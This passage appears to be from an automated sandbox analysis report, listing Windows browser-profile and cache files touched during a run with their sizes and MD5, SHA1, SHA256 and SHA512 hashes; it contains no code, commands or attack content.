4fd5d5de2214efc1b00ed9e670993e14

SHA1
9f4b22cf78835447fd7e1049de675d6f91c32b9c

SHA256
fc2d04267ac4efef0fb79756cee1af693aecf5c2a7526a0eb451656c5d716f7a

SHA512
d1242f726e925ea4bbb37fe9a31e553ed4ddb15fb082c9750e3f4ea06905423eac33dd79c5e525b2976d60e66573b23095342fafaa26c2f87db812be50992858

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
4KB

MD5
99599a3cbdba5afb16c12fe5c0d3924a

SHA1
9708bbb5852cf2290257632dd49a641c7170e8cf

SHA256
1ab1f129bda12dd268cbf07b0defa4d80f507c6cf751ec321bb187e6402a3e14

SHA512
3b79af29094b8126867cb572ed0d09183501c3ad5e9b6398e5a63d6a2004dfe962a4996013fb0c7315c86e67df9d9b28fafc6b692051826892ea9d241479f876

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
28KB

MD5
35be88bf4753a36a37df52277a94bd33

SHA1
d6a4cd6d8182d876c2c06c658416db0f7befb8ff

SHA256
e6f97535adce33ebc4a31c550bbbd9a46ca0e8781c028bd29bce3728ab24a471

SHA512
04697a7d7ce23fd448fe51cc91faf087a6f1af4f81e64ed73c72af56d3758ff3ae0ef018fe4ff5214869c170fe97c7ea4e19fab311ba15344376b2ca7f60f4fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
9fdaf7e89a7e96a8b21df67a1df5d62d

SHA1
38c9387146ef8cff8c911ff4e05b7c1af4f50c78

SHA256
3a85c6d71d932359f136604edef2ff66991dcd9c5fffbb2344fa75353eb748ea

SHA512
91786f8290e2843ec19e0d16778b2c15a5b0d164e9f11a204dc62741b11b6f160ac13e67101632cd69712908d7732928d1e339ef4201b109fdd9242382dba002

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
8e21934c597f20cdacdd613ab8ba8e26

SHA1
768808edb6c041413f7b7123f477e94d41586b99

SHA256
d77ea70ef3eb99a72868b5917887468f396660867b19ae89ffe8444132ed359a

SHA512
d1d1ba50b1f3ee8622a54cc8f909e2f269a01ef9d363dd92253ebe9e83547b37d57549d8860d4e5d63f9e109c235d9bda262f161f4eee9db4fcfca339bb761a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
4KB

MD5
8c17a21e023097f5ac9ec939398d5905

SHA1
bdf75569096200ba81dfe0dba3c4de24370d77d5

SHA256
40e7ea21ac3e38e8fe0160c68963add1674d382fbad325f34b5b11684ea071ae

SHA512
187129300405ac22d08b50e459f2fd5a2e48a05aa607012427696da54dc3d49f59435bb2f72a147c8f3a6a2c11a6a45805f284310216d210075466692efa7d30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
16KB

MD5
418b5e12cc040c71f73f41af23ce10be

SHA1
83b51b75b3f6e1bf5d3c29889662688ed2631f99

SHA256
72227e243f014fa14df406cbf18447b86f259de9ee54fb4eced344a6ac6c8ce1

SHA512
6f6fd2d0211884e284bfa4fba3832b90388210861a576faac80288c42e7849c77a0b99c32e3fd2778185927cf92703ceb013e348fc08c7abb1bb4b1418867628

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
1bd6fe5394ec7fd96f4a0bea1309c5cc

SHA1
c50933d906fdafbf792abf5b20a4cb796a7d067e

SHA256
adc53eda2c6ffcf993954dccec0d3c67f7d2991cc71bee465edcce7cc3a01a0e

SHA512
4b3577055a9c46ba8e9c55ebc38df2b052150b7ec65fdca2e92097ef2e99e498d8b3878210e7b714d4e7a16265e50bbb6eed769f57b894289ee1d92a2de12d1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
f04b1819964161de98613796f4914504

SHA1
3f1f1549a307717da1e979c5710d301fa1348d61

SHA256
6e4b450395a21fae20ea8ff1cbd392efa8711c1414f5f4a1d38a1b58a67f9fc9

SHA512
639ac6a49f140e1e1ee29edca6283fbb4698df26d07c1dbed7e65238aa124654c0ddce3df09e7fd483a6ab23b320767927a1e2d6240594f23582d6f4b5bfad52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
78cb82066667c4911bdc794c7c1baed0

SHA1
8cf7126344e8ba2501d15e495adf25f7eb5958e8

SHA256
da94f8d70e0e915036ecc16b620354223e5476568b5e18a422f04bdbd1b91b39

SHA512
f4bbf4a7ce3c88fed0093236a059b3cdbe791c3839367ba4fbfc9251ef2ac00e6dd83277c7348b47dbfc96af7f9ea248d2df9e25d6b55c940ba0abb699f5c57a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
c2b9733755115e0f27e4f572c0f3fcee

SHA1
bcc8cb6b25d68cf61d8e7ee26dd7f081088b8a17

SHA256
6c272c9b14de4b185e429cd37685e8756ba64bcd338be77c3103515c169694f5

SHA512
fada6d0aaeb4fc72781fabeb61ca5d202d7111f4b77435dba14361e3f178fe89f8634f22660b8f4c07f8ea2be8ec1c6e565ef0a2fa55e18432cfaf4aab23e147

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
add75c0c7b9c78adde06f5601ce87665

SHA1
eb7511dd7fd282a646289a0cebcb4f2c39f6b1e6

SHA256
31efd74ce0262fa6a056eb763623fdf0ab98eac46cc0e175003968bb85f63ceb

SHA512
28f4fcaef00b00bc00dfed8f1348dc7141cea852365e4c08dbfb3ecb1f202454db595a014bf29ec757fdcb780ea5e2c355505c6eaf81e1c7cdd67dc2b08fd203

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
020c6de98eff371968116b43fee9bac7

SHA1
e802ae37c0a7da328f62ed72cc834a556b0da1fe

SHA256
6b0f023985d7fc6c9a4d0686d4b49ba77915f62f758bfa461b95924648f15ac4

SHA512
5e7809f4b95d81365c7aa86bbc7f8e435785d67ee54b8604c6991a697e564cd71442c941f2aabb55a4d4cdfd6392cf6a7251468a3e5403b5541937b563c6752b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d29ad3bb3796022f88053a021d28e8ba

SHA1
16e9d6ba409ddf109c004fcb1d80277343b71f30

SHA256
720aa3faa51186ee87c4f74b652d2a3247b92968f175a2d6408cf199ff23e1e2

SHA512
a66472def960ffafe4e6b998469ceb4d1648ed61ab30d0f2519c80a8c822b06297628011d5859ec3efc1a1580cbba9b1f0267b6e122512a667a9c6e7387e7658

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
c07f6925f4b483236d56695dc98c6b5a

SHA1
bd903eaf9ade3a77128da63adf33370a140e883c

SHA256
965aef9db8c44d8150c6649f217903fccf2a97dc71eb20585eab1e16c238969e

SHA512
f694ae1841b938653d2f5e3cb42849a38b2253a6e19387187c92fd143122c68c34c48becfb32a211e70b822e2ff1b6ef356db8fa611e1806e44101a1f7662c6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b2bf7b59278689efc0be9496857943c7

SHA1
82757e1e206ca8ec74eabb3cf789105b2f1f1325

SHA256
ec1c75005777d528fefe864dee56bd310e9d33a971d1f117e9484ad66062520d

SHA512
9e0330d3b36e96a202757388eb027536faa45fa035abea461f0cdc60b83b7de3e3309c244b087d623e434565631566709d28c3da751ae3242ae4cb5fb85a5b04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7eec10706103638b04c79a57c3c22839

SHA1
bad33f29fef3d0ecb080e0b39ac4361284237884

SHA256
1b8745e375e86497ef6ea8cdcd1a22db21844b21c3da3889022909094b5a9efe

SHA512
366278284fe329a3eb45b944087365b47469caf5e5ea6ce44df9ae98cf14b360c2153eb02d515d21747cce264833b44e439a8b93db8134e3b4b2ebf88e9dbd0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
cded01b243e17be707163e2cb0bb077c

SHA1
99a061f55e056948701c8f16272dc3e8db72c825

SHA256
eaa60cff70d217aa4ae8dd657cf3663ef4b1671985bcf886b5fdf53676952c64

SHA512
43f7bb81ab25a7aaf6ac3786fcb4539e663b2a876122d271e4aa00215d73525022b66413d9e8f2c50d83f1e530a2a9db4ea5b3509d885609e32603c6af126c53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
dc642e241525ad39e1305cfb3f59c8f3

SHA1
422b8f406e5c359ea6ec27ab24eccdf4b0336e88

SHA256
896f7995f19abeb6c951a116c88578fdbb9c20bcc5b101f5d63b18d9c5e9c7d7

SHA512
4ad345f79504bf78c5b251e5efc99c153ab4e000b83c036d6635cc02f18b9375200b221c4a23c91e07b40cb7ae3562976c1693817324e13e60f15bc0326369f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c2bf2fa248fdcf46b8693a41541da0a5

SHA1
e00015c1e05bfe97fdca3bab1ff9775aaccd915b

SHA256
74db758a3ff8b6bc9ddcdfa9902ac8469f3e16822b575d421f23e605ce97ef80

SHA512
38973923b21ce3e1f0d8446e3b2402366244b4adb2df770b4a4075923e673736d9e0699404f78c60d1025b32a25ee2eb25411870f501c418237bf459d4bd7607

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
2c16cd2b14739ea7613347dc0b95bbe4

SHA1
433266e369c287f0aedd69a41acb36a7d4f8b9a9

SHA256
006b83ccfa661dee2b276463d34d4832e8cbba23aaa5252fb05167925c6482b9

SHA512
81f531c29a107a4effd44ae9a4ed5edf2e2f4b7faa8edccb1657e5a9f4144e3f99b7a971c1a433946f7d1c07ccf77fd48d5e1507a7207f8e566a9271f2c9c86b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
77a715335a77f8d22f17daa7a2680da4

SHA1
bb8fbd6a430d0e4c8660db84b163079007d90a7c

SHA256
afec6c7b7a06ef8b03ccd4922bb0871bdbd53d2a12cbfdb3df49c1fe47c778af

SHA512
7c69c4f60c4372c0da53ed6dc4f6c71ec76915cc3bec8e7852c310955f6c38a21aabd4c5aaee2f7685aa4f665ae742b0db6b6c1fa89e9fa264d644c1fff51c36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13371596896402386

Filesize
19KB

MD5
2b187570dd837226348f6da3ecf98a8f

SHA1
8eccb02a9ff01c7e97e628b0b5bc7d4274dd7e44

SHA256
fcf0c5260e5310b65c34a7bba5bb3378e2d11aa36a0282098ef8ae9feae14d41

SHA512
4fe24fbc9885fdbebc72cbfd9315a13a9450837070d2d692e635c2ab7234ce49f5e76e9ec046cb9e42f0b8eb9da7ab1253499f2171910d1f85777c6128106bc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\000003.log

Filesize
184B

MD5
eaa956ca2de3ca5dbd79f04c9df8bd7d

SHA1
bcaddb1c7a9e5c623682abedb8b3fecdb87cc228

SHA256
6f271feb8dd283ac30d79e1b6e78224245d672faa9970f47babe3be3b7c41a71

SHA512
196ea458b6914c6b114ded51a62139ca5f44e1215f716956b4883eeefb289f896496885e42ba2c086501b04d6abbe09f9fad84805de91d6735f7f9037942feb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
350B

MD5
2ada7255b7550ebd701f5b34560a686c

SHA1
8389e59db2a3d7420f53268f49fc1e145e86571c

SHA256
938976c5bbd9fb7ac1a2698fd470daa4c5da4a3cf02712bdf5669cdbbffcf5a5

SHA512
8f88c6e0fcd60e2bd031731de36cdc427622dc24ad888debf58ae5cf506957880ede440f6a3438f5635e4b7dd8a87d7d21bf0d4233606e09dd758c3351cfde6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
76cb50624720ca74c0a97a5d13021a4a

SHA1
db8941b37b25501bed955ab8c4ebbdabc7af4481

SHA256
82eb05de45e533a5cc72aab67137775be42d075a0d46678015a0048c9e47bc64

SHA512
30c9df8347e8b22c3e0aa3391f3e2a87c8266ba0625f7cd9a595be13e9deec51f9420b3f6b7f6538eebc2897d72df2ecbe4f77c927fa549a84ff9cc738bb495c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
878b52ad2e856833167823acaf5385ca

SHA1
164a8784782ce0e46163407fc703421978436e9d

SHA256
9d4486b2816f370c19380f7346d7c37c1af2b641dc21d143ebfb2011db7582a2

SHA512
1da134e675ec2d3dd4341e08817e9bb14a47e368fc1c52f45bdc8753a2c030e5c9ef3960350554b63f0d70a7f335283bb8cdc00375b27a6b72384e8b8927c7f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8abe3da1aad4c1d4468d817221b00cfd

SHA1
04790e8710e47ed9a80b6d6a59588ad82c8cd3b8

SHA256
a9172b65a02f8aff46a4099278afb53d5d36e4ae9f091515ce5116f4bb930a35

SHA512
dbb1b344332f9a258f751668d1d8c34403be523769f9fa19a3b931458bb56dca74f6b92227bfe3bae6ffc2b62facc1a49de072e6a0e4f57a9a2f1b4d7e4c76ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
6a6c323e3a871b687f8cb82fa2a121e7

SHA1
8418b7d6311d66bf0e4d680ce5831c1e4b1f273a

SHA256
1df5dcd04e7aac97ea73bd23cbaf6a9652ecc36eae08d6b2d502a6347c5f2840

SHA512
313da7d82f39933020b56fc8f0c3b8b7834db7d564a739d2373ba034ea1127b1d57065881469c00051068a2462a95e6073ea44a1c41be2bb287ad830d5c45fde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
242f8922ebb2efd896692ea8adfccadf

SHA1
a6a6e28aeb3e04488c00d6f42969d68e91c8e3fc

SHA256
2c022cf98a7067f6dea31a8c8dcdeae8cb7894990fcd993680d9b0f4956f8345

SHA512
00559dfdff8be6caf8477a97c83ff7c0fa4a30b02cadd464053772a09ca7ccec468ff7c84100c39d0c22e6d931942b47348d5b50bbddb4d3f0d2abe00f5e7b55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
687ea70c51eae61c52192c0b758c5958

SHA1
525a957be6d2c1a293766b0e745f2a55e04b3e29

SHA256
eb87f5ab31a7f1f0966604642802a22c0ee190c70f095a71e3cdf8f792f22380

SHA512
f4b63a0f3665e5542ca3621d636125159a346100e52142f03d3f20d8da2653f964172ffcd9ded182e75aab83963826c6c6c287ac4fb80b465f93aa78eaba4517

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
7ae9283110e7301c51726071dcb3e3f8

SHA1
a4df5e68abf8a46ad417f7dc1bdf0f12225f1463

SHA256
6c307e5e59a688ee0b33230cc58829baecba452b2949af876b8748778f939664

SHA512
a9532886dc89f51c3c736188bd8f69adc05e0c375a4c3d2bd82ac59778122a420efd9457b47cb863c5f0bf35d5302a4e5332ffa6066265d9becb2200057900c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
e0f677acbc16ff7dcf79c8687b4280a9

SHA1
9386b923c061d0b4a3e715484a2e19c3de4c7dba

SHA256
9d6b57ad2069941d77c85ef678fe974d73d83428d2e53d2e05f277add5952fae

SHA512
7bed051921f63405a57f3d7d51b6a3395bedff81898f92d356f0d8de00f767f2bf2af2452396af1de35405f33914f6787507c3cf2727d165bfdf329784b239b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
05b6efe6181c16b7bb8c744d6e3b2fec

SHA1
0088a6fa17f9b4c11897bc6244cfe09d266e3f62

SHA256
0d6b459e8e6cbac07dcb7326c6f0c151f08f37011c2004f56f6c8c4213972bc1

SHA512
3799972ac3d0dce2537bc90f7f792859bc007f0faa08df5dd18b161149215a11c3ca5463981ae4e683607a6a4b2d45cd9854408501955b79aeb227ae8050265c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe584e3a.TMP

Filesize
874B

MD5
67b727f9431827da9921761541aa68bc

SHA1
71b5f1ee9e30386e32171283f758ed499ad9ea25

SHA256
df86282f0838aeaf739acbfba15a68bb143e09f4507be7cb0eb279301e3d354c

SHA512
45f0c59451413d716c1858cd037db52071eed931b0e16d90278e7fa7f8675eee7f14b55328f0aaeb9b9179557afff63642abf0ef4054ee33cd522f5fa73e0904

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
d871b79aaa4555b917fd7df4484ea486

SHA1
41c5cce327b2a03fd9bba1a42cb7295410921b8f

SHA256
f7c685246bfc60fa52e9c954e1347bbcb8e8348c106f1349de6ac554ff9a01bc

SHA512
ee869d2e999a1500e3a148e125edee9a3df51b00200fbf69d4d0f73b7e11fe99e4a0575a0fc1f4ceb8ab21e4bb2f3453a386a129e2becdb1b9067adbef256c9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
116KB

MD5
af0b82f585c557b75d1631f1ff172461

SHA1
387a3c408fdfe75ca774dd50e2cb5224e5fa70b6

SHA256
560b17b16da5414baf404b1a3afd79334554a4d4583e6a3b223eb6b677e9849a

SHA512
409aa63adfe963c0e041ed8e771b74e053d8dea9b41244536d36f1224672332fd59ea7fc9d6011b445317cc2c76064c6405cd95cef0d7723d667e19f76c77687

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
72KB

MD5
587c64f2f8329a19d0dba09dde954765

SHA1
d7a2bc305653ff53834a4acf965f89720a71a752

SHA256
713d11b5c81892cc3d7d1aa9e529c6538822c793f3ab6b236402e8d5fd7089fc

SHA512
8ae85545227e35b922fe868bf0a8dbd5f6152969004839be2fadd4e6e14142c2e39248d95fcb500c42b3ff54b69a698da3cfc8f67819e148d35406210e68fff2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
f943572f02ca9c5b84fce998fc61d131

SHA1
ff00662f950320e283e5cff46ffc5e9245bbbb5b

SHA256
777bffc3b93d1956b5a4e548eab3b11f3857e8093ccc4e9008a98be0b43ff781

SHA512
493b93aeffabc99ec2cd0d185b6f32a047ca75d66b229e536cb3224982dd7061025382381eec92fa632974b735a68b6dfe1c87d5a7932dcd98f01ce8771ba287

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
0ff75c5e902676be6c5f93ed317048d3

SHA1
9ef752cec1cdc0456ec7a2fb7e53e5c97a5fadd8

SHA256
ea2b4adc0dee0aab20ce0e9e376a70e5f00a09776969b9e20bec133897b1b658

SHA512
3199e8ce3539dbf08cf076044d58a25697a6da122c187532bceef7da68fbdf3fa801550b290e4aad089b8217355b0a8cd061014bf5ec2e4eb464857035f73085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
5aeefb647c4e3b84be1038a21f2eeec0

SHA1
5b51761215a6209ef3c4a86f930680ca371eeb9f

SHA256
ce0866f5817a8fc9694a1326e84fa50b83bf576725d2701dc402c5f33a01c40b

SHA512
708e9ad306e2dabfbdb82e6d57cc8a739aa28c16faae5763990060f8e6e2176d1f2e0d04fa32d2b08e788ee7990f6908bce2a32607d853ab4bfc55183a9c1bd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001

Filesize
22KB

MD5
1ac9e744574f723e217fb139ef1e86a9

SHA1
4194dce485bd10f2a030d2499da5c796dd12630f

SHA256
4564be03e04002c5f6eaeaea0aff16c5d0bbdad45359aef64f4c199cda8b195e

SHA512
b8515fb4b9470a7ce678331bbd59f44da47b627f87ea5a30d92ec1c6d583f1607539cd9318a5bccf0a0c6c2bd2637992e0519bd37acdf876f7a11ed184fb5109

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002

Filesize
16KB

MD5
f55234db88c6538e3f4ad45c114435f1

SHA1
c4dba9a32f50f2d9a27ce81a1d62f7587751e6b6

SHA256
bf139ca7efd187c36f3ec33691f427205a63ca2707af18bc25430637928d713a

SHA512
8a621fa5044977bce987b8259dc850faf83f4e82f4df1a7a689dbbb0b9b065676842f7ac462b77f66c3ef892c3272960bf5de4c0dd4f02e85430b368867feda3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a9b9d719649f1ad05d78c034fb38b287

SHA1
c9c5973d07570e9c56e09f87b64283c5d98feba8

SHA256
d0b8843648fec94e7e2b31e8c1e061a76f89189e346f41ae143cd33ba21205a3

SHA512
d933c6483daba229a40b92660568476a3212d068f2dc34170d1f8ba98e5c235bf64bacf62a134f84c276003d123501b7b929a5ee45e0a77f7169c58851023945

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ec2cd63cc88d32dc29b33a21159620bb

SHA1
2e64f8be29d1fc91b505ce4a34613f072a0a0687

SHA256
d62d8c4dc254ddc67ca96c79248d56ef1ae421476a39b570d945c6d7a833c3a8

SHA512
62f022207c766edd480c4bd3ccc87612085cd9312424080894e53a29807b99a7103d416c09fa8855ae526ae9faebe94568032606ad173b7cd9f10c48569fdcc5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
751d5c2dc1ac27aaeeb9da533b15c0b2

SHA1
3f1344d0fea06554332d039ac8f63962d11bce0d

SHA256
ccfc1072fde264485768007b8879b5cfa51fea24e3829f9a152a5a4616e7a220

SHA512
3bb8a0239fd082dd2f3b72ae5c6ed71098cbcbc7ecac9b61068dbb807f9b6efa406563c96964423c0a74a898be86c8b0b6d48a38226aa6abff3d1765a9ad94c2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
63557876450966ebeedf0af1cc8f55f6

SHA1
7f19468dcd8e6db825100ba5dc108448ee7c51ae

SHA256
56fb0b4a3be2b4dd33f41d8a1006f3cb3af759d2b55dea03de970a5373567f1b

SHA512
e56c4972fb71988b170040ba438e64bdabe4450df90c5269b72d9b88b47582217d30459106a4e14d184a81ed7b349391a51433991321fe2591e03963c0649549

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
e44cc46e9112412dc9ad1f7a05abbe1d

SHA1
394b075f4d15c734f639409516bea39510e38531

SHA256
73fbf7cfe40b11f9e072e972cbd513d669598d92eedc76abf37be8a5a92981f5

SHA512
f9073349517d8eea7d790ae118754deb3f88a2adb46c9f73c6df2941fd482afaf3ebb45cd520761ea96c3926fc4fa7f63951a145d8f8ffa1e43e8772f0fd39a1

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lirn7gz7.default-release\activity-stream.discovery_stream.json

Filesize
27KB

MD5
a11373372ec8c0eb6d1266e675c36480

SHA1
39f71066cf94cf0306ccad82d0f50a10d683671e

SHA256
eea93aa33c4faf8c583a3966309a9dd20020ecde7f2f1d9754bae31b244103f1

SHA512
44b0b0bcf267756096f410ec22c7e3e20291c6df99af1571abe6f2b0e6cae60c087885a856a6799d359226f5330cf5085b9f137535da116cf7344f5e00f1e613

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ur4zuun4.dpf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\AlternateServices.bin

Filesize
6KB

MD5
5deeed97c4f9307dc0f73ca1d3b82c04

SHA1
bd443d7cb576ad8f0bb686fe80efc9ad76da968e

SHA256
33c486625ae89d09cf77c5f7f7de222a188d1c8e0f527e4fc85605387ce0a159

SHA512
4ac4a6c017cc333f7bf1caf0e94c1f99271f78f561ab63cc49c3b1a1e69273a5ffb6c92cab71123e0b0a39982f30d84bcd80e1b8f32f4a74d60ea958d0ea316b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
60d84af25fb96d1b31586f7cc9f22896

SHA1
704e5534a38bce7827b97447de39195d1fc842b3

SHA256
1529012a1297fdfed6600ed4acbd957e615550a056f3e5e1b65088e2b9466da5

SHA512
45d9ea2b85fb4f6bdc302a296aa377a4d16b12b85a94201ff8875e09011f37e920867e4c07ea998ef015aadf17ff316dafbdc8192ddc7e9fc43d89ded72c21bd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
247dc5ab68f942456cc41e077fa6ae08

SHA1
a371070d5d0f36ddb8cb0a06c2b6614ce5f11b64

SHA256
ea653b6a89d078a75c89d616cb89f90e4c9e69dec3bffd59848ea6b34be0c1e6

SHA512
2626dc5344edbe8be315dfb1b81c82b71f3f309c74453b0d8acd5e0096dfb8ae52373e47cec10cfc424bea3d608d82e93e1491cd248fcc0a8e5f3ac588963cde

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
0db892df0f3ddaab491dce954c6c36f3

SHA1
2d8a50f7d0c1d00bcb0b8c23710be66b2e91994b

SHA256
2d87ddeba2e3cbe352a15aee30f7fdcac778fed8087a4f7bf18dc54e850e7a70

SHA512
22a7b46fe8a5bb5727ee669f82a0f4758a8691f043f8c75e4d7826f209f4c483843291ad8f74a15770799ada5118412f443c4d56cdeb8127d582eb94f04da1e5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lirn7gz7.default-release\datareporting\glean\pending_pings\0763a2f2-a6da-49fe-875f-1fbb5e1459db

Filesize
982B

MD5
1fe6c8382393b84d9a878e2d5b6099d1

SHA1
545ef6cd06c5545807821e3bc4fb942b9b66ffa7

SHA256
